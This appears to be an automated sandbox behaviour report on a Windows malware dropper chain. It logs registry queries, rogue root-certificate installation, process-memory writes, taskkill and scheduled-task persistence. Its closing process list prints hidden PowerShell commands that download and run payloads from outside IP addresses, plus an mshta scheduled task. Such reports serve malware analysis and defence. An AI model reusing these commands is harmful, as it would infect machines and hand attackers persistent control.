Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted]
530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\ProgramData\rbkvgg\bdhx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2676 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
PID 2676 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
PID 2676 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
PID 2676 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
PID 3008 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3008 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3008 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3008 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2728 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2728 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2728 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2728 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2336 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1120 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1120 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1120 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2728 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2728 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2728 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1492 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1492 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1492 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1492 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2728 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
PID 2728 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
PID 2728 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
PID 2728 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
PID 2500 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\cmd.exe
PID 2500 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\cmd.exe
PID 2500 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\cmd.exe
PID 2500 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\cmd.exe
PID 2500 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\mshta.exe
PID 2500 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\mshta.exe
PID 2500 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\mshta.exe
PID 2500 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\mshta.exe
PID 1748 wrote to memory of 2276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1748 wrote to memory of 2276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1748 wrote to memory of 2276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1748 wrote to memory of 2276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1224 wrote to memory of 2836 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 2836 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 2836 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 2836 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 296 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 296 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 296 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 296 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2900 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2900 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2900 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2900 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2900 wrote to memory of 2960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2900 wrote to memory of 2960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2900 wrote to memory of 2960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe

"C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9D29.tmp\9D2A.tmp\9D2B.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn YoRTsmaxx5v /tr "mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn YoRTsmaxx5v /tr "mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE

